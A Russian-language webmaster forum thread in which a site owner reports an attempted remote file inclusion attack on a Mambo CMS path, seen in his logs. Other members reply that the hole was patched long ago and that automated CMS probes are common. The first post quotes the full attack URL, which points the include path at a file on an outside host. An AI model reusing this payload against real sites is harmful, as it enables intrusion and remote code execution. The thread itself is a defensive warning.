Иньекции в сайты на Мамбе. Внимание !!!

Deni
На сайте с 15.04.2006
Offline
355
1074
Приветствую всех

На мамбе сайтов не делаю уже много лет и забыл давно про эту систему.

Сегодня на одном из своих сайтов увидел переход по урлу

/internet/cms/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://i-take.nl/ingridmuijs/components/com_extcalendar/index.gif?

Очень удивился и начал искать где и что пытались этим получить

там иесть интересная вставка (я плохо разбираюсь и комментировать не буду)

Начал я спешно программиста мучить и волосы рвать :)

Спустя полчаса ничего умного не пришло но догадался глянуть страницу

Там говорилось что то про движек Мамба

Далее.

Обращение у меня было в подкаталог /internet/cms/ и именно там были тексты с упоминание слов Мамба и Джумба

Сделал вывод.

Какая то система сканирует выдачу и на сайты где упоминается слова Мамба пытается делать инклуд для воровства сессий. (мнение програмиста который смотрел код)

Это чисто мои предположения но именно это мне удалось понять.
Было бы интересно услышать мнение специалистов ну и заодно предупредить Владельцев сайтов на Мамбе.
ПЗ
На сайте с 10.10.2006
Offline
92
#1

Сейчас это уже не актуальная тема. По-моему еще в версии мамбо 4.5.2.2 исправили эту уязвимость.

4.5.2.3 - последняя версия мамбы до появления джумлы, после выхода джумлы - смысла работать с мамбо вообще нет. уж как медленно развивалась джумла-то, а мамбо вообще тогда встала на месте.

Автомобили в России (http://www.autobb.ru/). Спецтехника BIZ - вся строительная, дорожная, коммунальная техника (http://www.spectehnika.biz/) и другая спецтехника в одном месте.
edogs software
На сайте с 15.12.2005
Offline
775
#2
Deni:
Сделал вывод.
Какая то система сканирует выдачу и на сайты где упоминается слова Мамба пытается делать инклуд для воровства сессий. (мнение програмиста который смотрел код)

Вывод скорее всего правильный.

На предмет чего именно система сканирует и что именно - сказать сложно.

У нас есть сайт полностью на чпу, без упоминаний мамб, жумл, нюков и т.д. за месяц набирает в логах "стандартных" движковых атак штук 50, направленных на самые разные CMS.

Так что особо циклится не стоит, тем более если дырка эта уже закрыта.

Разработка крупных и средних проектов. Можно с криптой. Разумные цены. Хорошее качество. Адекватный подход. Продаем lenovo legion в спб, дешевле магазинов, новые, запечатанные. Есть разные. skype: edogssoft

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий